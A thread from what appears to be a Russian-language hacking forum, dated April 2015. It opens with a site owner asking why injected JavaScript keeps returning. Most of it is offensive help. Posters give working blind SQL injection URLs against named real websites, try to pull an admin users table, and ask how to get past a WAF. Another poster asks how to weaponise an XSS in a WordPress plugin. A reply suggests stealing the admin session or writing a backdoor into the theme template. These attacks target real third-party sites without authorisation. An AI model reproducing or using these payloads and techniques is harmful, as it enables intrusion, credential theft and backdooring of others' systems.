07.04.2015, 04:17
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 448
С нами:
8265206
Репутация:
40
|
|
Сообщение от попугай
↑
Есть сайт на VDS, на нем стал появлятся какой-то левый js-код в некоторых js-файлах. PHP-работал от того же юзера, что и на FTP, то есть имел полные права. Я удалил код, поискал шеллы - не нашел ничего, сменил пасс на ftp. Через несколько дней код снова появился. Обшарил все - шеллов не нашел, но были мои шеллы, я подумал что как-то через них может заливается чувак, сменил пассы на них, удалил код, права поменял, теперь php работает как nobody, на js-файлы теперь доступа нет. Через несколько дней снова код появился, я в ахуе. Проверяю логи apache - нет ничего подозрительного, проверяю логи панели vds - тоже ничего подозрительного. И что характерно, права на js-файл сменены на 777, то есть кто-то имеет доступ к аккаунту, что и ftp. Как это возможно? Как найти паразита?
Очевидно, троян на вашем компьютере.
Айболитом не проверяли?
|
|
|
07.04.2015, 04:29
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от 5maks5
↑
Очевидно, троян на вашем компьютере.
Айболитом не проверяли?
Троян теоретически возможен. Но windows security essentials молчит, да и в автозагрузке ничего подозрительного.
|
|
|
|
07.04.2015, 09:57
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
|
|
|
|
07.04.2015, 10:52
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Код:
http://www.amnh.org/ology/xCards/index.php?cardNumber=047%27+/*!and+(select+1+regexp+if(mid(@@version,1,1)=5,1,%27(%27))*/+--+ TRUE
http://www.amnh.org/ology/xCards/index.php?cardNumber=047%27+/*!and+(select+1+regexp+if(mid(@@version,1,1)=4,1,%27(%27))*/+--+ FALSE
Извращенский вариант, но имеет право на жизнь
// YaBtr: Regexp |
|
|
|
07.04.2015, 10:52
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
|
|
|
|
07.04.2015, 22:05
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
Код:
https://www.maesen.com/sexshop/video_web.php?video=(6635)and(1)=1 - TRUE
http://www.maesen.com/sexshop/ArticulosMini.php?pagina=(45)and(1)=1 - TRUE
http://www.maesen.com/sexshop/ArticulosMini.php?pagina=(45)and(1)=0 - FALSE
https://www.maesen.com/sexshop/video_web.php?video=(6635)and(1)=0 - FALSE
не могу waf обойти, есть варианты?
PS
Код:
http://www.maesen.com/sexshop/video_web.php?video=(88886635)or+1=(SELECT+TOP+1+'id'+FROM+adminusuarios)
с information_schema.tables вытащить имя колонок с таблицы adminusuarios не получается, при использовании "_" пишет нет такой директори |
|
|
|
10.04.2015, 10:29
|
|
Новичок
Регистрация: 20.03.2014
Сообщений: 24
С нами:
6394646
Репутация:
0
|
|
Сканировал с помощью акунетикса: /wp-content/plugins/gd-star-rating/ajax.php
Нашел XSS, написано:
asr.84391.0.7.1428069437.10.0.30.3.3.0'"()&%prompt (973439)
Как его использовать? И даст ли это возможность доступа к бд ?
Раскручивать sql немного умею, но здесь не знаю куда копать.
|
|
|
|
10.04.2015, 11:33
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от larinvlad
↑
Сканировал с помощью акунетикса: /wp-content/plugins/gd-star-rating/ajax.php
Нашел XSS, написано:
asr.84391.0.7.1428069437.10.0.30.3.3.0'"()&%prompt (973439)
Как его использовать? И даст ли это возможность доступа к бд ?
Раскручивать sql немного умею, но здесь не знаю куда копать.
Можете составить запрос который похищает сессию, и в парить его админу или составить запрос который автоматом вписывает бегдор в шаблон темплейта, но естественно это должен сделать авторизованный админ.
|
|
|
|
10.04.2015, 12:28
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от winstrool
↑
Можете составить запрос который похищает сессию, и в парить его админу или составить запрос который автоматом вписывает бегдор в шаблон темплейта, но естественно это должен сделать авторизованный админ.
Ты ему не помог, ему нужно раскрутить sql через xss .
|
|
|
|
10.04.2015, 13:13
|
|
Новичок
Регистрация: 20.03.2014
Сообщений: 24
С нами:
6394646
Репутация:
0
|
|
Сообщение от winstrool
↑
Можете составить запрос который похищает сессию, и в парить его админу или составить запрос который автоматом вписывает бегдор в шаблон темплейта, но естественно это должен сделать авторизованный админ.
Не могли бы скинуть ссылку на статью где рассматривается выполнение подобных запросов?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
